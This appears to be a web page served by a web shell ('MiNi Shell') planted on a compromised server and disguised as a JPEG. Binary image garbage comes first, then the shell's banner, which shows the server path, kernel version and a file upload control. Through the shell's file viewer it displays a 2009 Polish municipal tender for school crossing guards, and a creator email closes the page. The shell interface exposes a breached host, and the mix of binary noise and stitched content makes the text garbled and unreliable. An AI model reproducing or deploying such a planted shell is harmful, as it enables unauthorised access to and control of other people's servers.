JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091022/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091022/184891-N-2009.html

<p class="kh_header"><b>Piotrków Trybunalski: ŚWIADCZENIE USŁUGI POD NAZWĄ: PRZEPROWADZANIE DZIECI PRZEZ ULICE PRZY SZKOŁACH, W RAMACH PROGRAMU BEZPIECZNE MIASTO</b><br>
<b>Numer ogłoszenia: 184891 - 2009; data zamieszczenia: 22.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Dróg i Komunikacji , ul. Belzacka 176, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 7339252, faks 044 7329253.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzdik.piotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUGI POD NAZWĄ: PRZEPROWADZANIE DZIECI PRZEZ ULICE PRZY SZKOŁACH, W RAMACH PROGRAMU BEZPIECZNE MIASTO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ŚWIADCZENIE USŁUGI POD NAZWĄ: PRZEPROWADZANIE DZIECI PRZEZ ULICE PRZY SZKOŁACH, W RAMACH PROGRAMU BEZPIECZNE MIASTO.
Sposób świadczenia zamawianych usług musi być zgodny z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 18 lipca 2008 roku w sprawie kierowania ruchem drogowym (Dz. U. z 2008 roku, Nr 132 poz. 839) oraz rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 18 lipca 2008 roku w sprawie wzoru ubioru niektórych osób uprawnionych do wydawania poleceń i sygnałów w zakresie kierowania ruchem na drodze (Dz. U.  z 2008 roku, Nr 132, poz. 840)
1. Osoba nadzorująca bezpieczne przejście dzieci przez jezdnię, powinna być podczas podawania poleceń i sygnałów wyposażona w prostokątną, specjalną tarczę barwy żółtej fluorescencyjnej z umieszczonym w polu ośmiokątnym znakiem barwy czerwonej z napisem STOP.
2. Osoba nadzorującą bezpieczne przejście dzieci przez jezdnię, powinna być, podczas wydawania poleceń i sygnałów w zakresie kierowania ruchem na drodze, wyposażona w płaszcz zgodny z Polską Normą PN-EN 471:2008 o barwie fluorescencyjnej pomarańczowo-czerwonej z żółtymi elementami odblaskowymi zgodnymi z Polską Normą PN-EN 471:2008.
3. Sygnały lub polecenia dla kierujących pojazdami osoba nadzorująca bezpieczne przejścia dzieci przez jezdnię podaje za pomocą tarczy opisanej w pkt.1
4.Osoba nadzorująca bezpieczne przejścia dzieci przez jezdnię, przed podaniem sygnału do wstrzymania ruchu pojazdów jest obowiązana do:
a) wejścia na przejście dla pieszych z uniesioną tarczą, w sposób niezmuszający kierujących do gwałtownego hamowania; płaszczyzna tarczy powinna być skierowana w stronę jadących pojazdów;
b) zezwolenia pieszym na przejście przez jezdnie dopiero po upewnieniu się, że pojazdy się zatrzymały;
c) zejścia z przejścia dopiero po opuszczeniu jezdni przez pieszych; oznacza 
to zezwolenie na kontynuowanie jazdy pojazdów.

Osoba nadzorująca bezpieczne przejście dzieci przez jezdnię musi posiadać aktualne zaświadczenie o ukończeniu szkolenia do kierowania ruchem drogowym wydane przez Dyrektora Wojewódzkiego Ośrodka Ruchu Drogowego.

Ponadto osoby nadzorujące bezpieczne przejście dzieci przez jezdnię tj: strażnicy zobowiązane są do:
1) wykonywania swojej pracy, na przejściu dla pieszych wytypowanym dla danej szkoły;
2) czuwania nad bezpieczeństwem pieszych na nadzorowanym przejściu, tj.:
a) kierowania ruchem drogowym na przejściu dla pieszych w sposób umożliwiający bezpieczne przejście dzieci przez jezdnię, 
b) reagowania na nieprawidłowe zachowanie się dzieci na nadzorowanym przejściu lub w jego bezpośrednim sąsiedztwie;
c) zwracania uwagi, w miarę możliwości, na nieprawidłowe zachowanie się uczniów dojeżdżających do szkoły rowerami i motorowerami oraz przy wsiadaniu i wysiadaniu z autobusów dowożących dzieci do szkoły;
d) zawiadamiania stosownych władz o zaistniałych zagrożeniach w obrębie nadzorowanego przejścia;
e) przebywania na przejściu w czasie określonym (w formie pisemnej) przez dyrektora szkoły w godz. od 7.30 do 15.30, a w przypadku niektórych szkół również po godzinie 15.30, przy czym sumaryczny czas pracy po godz. 15.30 nie przekroczy łącznie 20 godzin w każdym tygodniu nauki;
f) wykonywania innych zadań przez strażnika w czasie, kiedy nie przebywa na przejściu, związanych z bezpieczeństwem uczniów, zlecanych przez dyrektora szkoły.

Wymagane jest zapewnienie ciągłości usługi tj. zastępstwo w przypadku nieobecności strażnika.
Wykonawca nie będzie świadczył usługi będącej przedmiotem niniejszego zamówienia w okresie miesięcy lipca i sierpnia i z tego tytułu nie będzie otrzymywał wynagrodzenia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 85.31.13.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> NIE DOTYCZY<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zamawiający wymaga, aby Wykonawcy spełniali niżej określone warunki udziału 
w postępowaniu:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia z przyczyn określonych w art 24 ust. 1 i 2 ustawy PZP.
Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
Zamawiający dokonywał będzie oceny w następujący sposób:

1.Wyjaśnienia treści złożonych ofert, omyłki pisarskie i rachunkowe: 
W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych ofert. Niedopuszczalne jest prowadzenie między zamawiającym a wykonawcą negocjacji dotyczących złożonej oferty oraz, 
z zastrzeżeniem art. 87 ust. 2 ustawy PZP, dokonywanie jakiejkolwiek zmiany w jej treści tj:
Zamawiający poprawia w ofercie:
a) oczywiste omyłki pisarskie,
b) oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek,
c) inne omyłki polegające na niezgodności oferty ze specyfikacją istotnych warunków zamówienia, nie powodujące istotnych zmian w treści oferty
- niezwłocznie zawiadamiając o tym wykonawcę, którego oferta została poprawiona.

2. Sposób oceny zgodności oferty z treścią SIWZ
Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy PZP lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1 ustawy PZP, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu w którym upłynął termin składania ofert.

Zamawiający wzywa także, w wyznaczonym przez siebie terminie, do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy PZP.

Zamawiający wykluczy z postępowania Wykonawców w przypadkach określonych 
w art. 24 ustawy - Prawo zamówień publicznych.
Ofertę Wykonawcy wykluczonego uważa się za odrzuconą.

Ocena zgodności ofert z treścią SIWZ przeprowadzona zostanie wyłącznie na podstawie analizy dokumentów i materiałów, jakie Wykonawca zawarł w swojej ofercie z zastosowaniem treści art. 26 ust. 3 ustawy PZP.

Ocena spełniania warunków opisanych w pkt V SIWZ nastąpi na podstawie oświadczeń i dokumentów o których mowa w pkt VI SIWZ i zostanie dokonana zgodnie z formułą spełnia - nie spełnia. 

Warunki udziału w postępowaniu zostaną uznane za spełnione, jeżeli wykonawca złoży wszystkie wymagane oświadczenia i dokumenty, o których mowa w pkt VI SIWZ, a które składają się na ofertę..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla potwierdzenia spełniania warunków udziału w postępowaniu, Wykonawcy winni przedłożyć niżej wymienione oświadczenia i dokumenty:
1) Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu (wzór nr 2 do SIWZ);
2) Oświadczenie o nie podleganiu wykluczeniu z postępowania (wzór nr 3 do SIWZ);
3) Oświadczenie o sytuacji ekonomiczno - finansowej (wzór nr 4 do SIWZ);
4) Polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej;
5) Aktualny odpis z właściwego rejestru, albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (oryginał lub kserokopia poświadczona za zgodność z oryginałem prze Wykonawcę);
6) Oświadczenie o braku zaległości podatkowych wobec Urzędu Skarbowego, oraz o braku zaległości z tytułu składek na Ubezpieczenia Społeczne (wzór nr 5 do SIWZ);
7) Oświadczenie, iż Wykonawca posiada niezbędną wiedzę i dysponuje lub dysponować będzie osobami zdolnymi do wykonania zamówienia oraz, że w przypadku wyboru jego oferty jako najkorzystniejszej a, przed podpisaniem umowy w sprawie zamówienia publicznego zobowiązuje się do złożenia w siedzibie Zamawiającego wykazu osób (według załączonego wzoru nr 7 do SIWZ), które będą uczestniczyć w realizacji zamówienia wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonywania zamówienia wraz z kserokopiami aktualnych zaświadczeń potwierdzających ukończenie szkolenia w zakresie kierowania ruchem drogowym wydanych przez dyrektora wojewódzkiego ośrodka ruchu drogowego (zgodnie z § 9 rozporządzenia MSWiA z dnia 18 lipca 2008 roku w sprawie kierowania ruchem drogowym) oraz kserokopią dowodów osobistych (wzór nr 6 do SIWZ): 

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 1 ust. 1 pkt 2,3 i 5 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie  rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2006 r. Nr 87, poz. 605 ze zm.) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiedziano, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości,
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
- nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne 
lub zdrowotne albo, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu.

Jeżeli w kraju, pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę 
lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w § 1 
ust. 1 pkt 2, 3 i 5 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
	
Dokumenty sporządzone w języku obcym, składa się wraz z tłumaczeniem na język polski, sporządzonym przez tłumacza przysięgłego. 

DOTYCZY WYKONAWCÓW WSPÓLNIE UBIEGAJĄCYCH SIĘ O UDZIELENIE ZAMÓWIENIA (KONSORCJUM):

Wykonawcy wspólnie ubiegający się o udzielenie zamówienia musza wykazać, że:
- warunki opisane w pkt V.1) i 4) SIWZ spełniają każdy z osobna,
- warunki opisane w pkt V.2) i 3) SIWZ spełniają łącznie.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mzdik.piotrkow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MIEJSKI ZARZĄD DRÓG I KOMUNIKACJI 
PIOTRKÓW TRYBUNALSKI, UL. BELZACKA 176 W POK. 15
DOSTĘPNA PO ZŁOŻENIU PISEMNEGO WNIOSKU O WYDANIE SIWZ, WZÓR WNIOSKU ZNAJDUJE SIĘ NA STRONIE ZAMAWIAJĄCEGO..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.11.2009 godzina 09:00, miejsce: MIEJSKI ZARZAD DRÓG I KOMUNIKACJI
97-300 PIOTRKÓW TRYBUNALSKI
UL. BELZACKA 176 POK. 2 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com